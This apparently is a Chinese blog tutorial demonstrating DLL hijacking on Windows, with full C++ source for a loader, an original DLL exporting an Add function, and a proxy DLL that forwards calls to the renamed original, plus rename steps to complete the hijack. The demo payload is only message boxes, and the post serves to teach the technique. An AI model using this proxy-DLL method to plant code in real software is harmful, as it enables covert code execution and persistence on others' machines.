标签:
控制台程序:DllLoader
Dll加载器,用于动态加载目标Dll,并动态调用目标函数
1 #include <cstdio> 2 #include <windows.h> 3 4 typedef int (*pAdd) (int a, int b); 5 6 int main() 7 { 8 HMODULE hModule = GetModuleHandleA("Dll.dll") != NULL ? GetModuleHandleA("Dll.dll") : LoadLibraryA("Dll.dll"); 9 pAdd Add = (pAdd)GetProcAddress(hModule, "Add"); 10 if (NULL == Add) 11 printf("Failed\n"); 12 else 13 printf("Succeed\n1 + 1 = %d\n", Add(1, 1)); 14 15 system("pause > nul"); 16 return 0; 17 }
原Dll:Dll
很简单的一个Dll,只有一个隐式函数Add.仅仅是一个简单的加法..
1 #include <cstdio> 2 #include <windows.h> 3 4 #define EXTERNC extern "C" 5 #define EXPORT __declspec(dllexport) 6 #define ECEP EXTERNC EXPORT 7 8 BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) 9 { 10 switch(fdwReason) 11 { 12 case DLL_PROCESS_ATTACH: 13 MessageBoxA(NULL, "Attach", "", MB_ICONINFORMATION); 14 break; 15 case DLL_PROCESS_DETACH: 16 MessageBoxA(NULL, "Detach", "", MB_ICONINFORMATION); 17 break; 18 default: 19 break; 20 } 21 22 return TRUE; 23 } 24 25 ECEP int Add(int a, int b) 26 { 27 return a + b; 28 }
劫持Dll:HijackDll
用于劫持原Dll,并转发原程序的动态调用
1 //last code by gwsbhqt at 20150727 2 3 #include <cstdio> 4 #include <windows.h> 5 6 #define EXTERNC extern "C" 7 #define NAKED __declspec(naked) 8 #define EXPORT __declspec(dllexport) 9 #define ECEP EXTERNC EXPORT 10 #define ENCDECL EXTERNC NAKED void __cdecl 11 #define EENSTD EXTERNC EXPORT NAKED void __stdcall 12 #define EENFAST EXTERNC EXPORT NAKED void __fastcall 13 #define ENDEF ENCDECL 14 15 #define INITFARPROC(lpModuleName, hProcName) 16 HMODULE hModule;17 hModule = GetModuleHandleA((lpModuleName));18 if (NULL == hModule) hModule = LoadLibraryA((lpModuleName));19 GetProcAddress(hModule, (hProcName));20 __asm JMP EAX; 21 22 #pragma comment (linker, "/EXPORT:Add=_Add,@1") 23 24 ENDEF Add() 25 { 26 INITFARPROC("Dll.tmp", "Add"); 27 } 28 29 BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) 30 { 31 switch (fdwReason) 32 { 33 case DLL_PROCESS_ATTACH: 34 MessageBoxA(NULL, "Hijack Dll Attach", "", MB_ICONINFORMATION); 35 break; 36 case DLL_PROCESS_DETACH: 37 MessageBoxA(NULL, "Hijack Dll Detach", "", MB_ICONINFORMATION); 38 break; 39 default: 40 break; 41 } 42 43 return TRUE; 44 }
都是些很简单的代码,仔细认真看看就好了
测试是只需要新建一个工程,工程下新建三个项目,分别是一个控制台程序和两个动态链接库,
在每个项目新建main.cpp文件,将代码贴入,生成工程之后.在Debug/Release文件夹下,将Dll.dll更名为Dll.tmp,将HijackDll.dll更名为Dll.dll...
即可完成Dll劫持...
标签:
原文地址:http://www.cnblogs.com/gwsbhqt/p/4679088.html
